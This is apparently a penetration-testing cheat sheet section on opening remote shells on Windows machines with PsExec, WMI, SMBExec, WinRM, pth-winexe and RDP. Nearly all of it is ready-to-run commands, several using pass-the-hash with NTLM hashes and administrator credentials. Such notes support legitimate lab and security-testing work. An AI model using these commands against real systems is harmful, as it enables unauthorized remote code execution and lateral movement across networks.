x

Remote Shells

23.2.1 - PsExec

Will require access to C$ and ADMIN$ 

impacket-psexec \\afcr-dc.afc-richmond.local -u administrator -p <password> cmd.exe

impacket-psexec -u administrator -p <password> cmd.exe

.\PsExec64.exe \\<target> -u corp\jen -p <Password123> cmd

impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8c802621d2e36fc074345dded890f3e5 Admin@192.168.129.59

impacket-psexec -hashes lm:ntlm zenservice@192.168.183.170

proxychains impacket-psexec USERC:USERCishere@10.11.1.50 cmd.exe

23.2.2 - WMIExec & WMI

WMI (Windows Management Instrumentation) is a core Windows feature that allows remote and local interaction with system components — like services, processes, registry, and hardware — through a standardised interface. It's part of Microsoft's implementation of Web-Based Enterprise Management (WBEM), which uses the CIM (Common Information Model) schema.

(this'll require SMB port, file and printer sharing enabled, the ADMIN$ share to be enabled and local admin rights on the target) This is likely to be accessible to the administrator obviously. 

impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass

impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> 

impacket-wmiexec Administrator@[target] -hashes [LM]:[NT/NTLM]

impacket-wmiexec Administrator@10.11.1.22 -hashes [leavebankifnoLM]:ee12345067801f38115019ca2fb

Execute a command utilising WMI locally 

Invoke-WmiMethod -Class Win32_Process -Name Create -ComputerName <target> -Credential (Get-Credential) -ArgumentList "cmd.exe"

Legacy WMIC command 

wmic /node:<target> /user:<user> /password:<pass> process call create "cmd.exe"

23.2.3 - SMBExec

impacket-smbexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass

impacket-smbexec <domain_name>/<user_name>@<remote_hostname>

23.2.4 - WinRM

evil-winrm -u <user> -p <password> -i 172.16.138.83

evil-winrm -u <user> -H <hash> -i 172.16.138.83

Secure (HTTPS) mode 

evil-winrm -u <user> -H <hash> -i 172.16.138.83 -S

23.2.5 - pth.winexe

pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe

23.2.5 - RDP

rdesktop -u 'USERN' -p 'abc123//' 192.168.129.59 -g 94% -d example

xfreerdp /v:10.1.1.89 /u:USERX /pth:5e22b03be2cnzxlcjei9cxzc9x

xfreerdp /cert-ignore /bpp:8 /compression -themes -wallpaper /auto-reconnect /h:1000 /w:1600 /v:192.168.238.191 /u:admin /p:password

xfreerdp /u:admin  /v:192.168.238.191 /cert:ignore /p:"password"  /timeout:20000 /drive:home,/tmp
Left-click: follow link, Right-click: select node, Scroll: zoom
x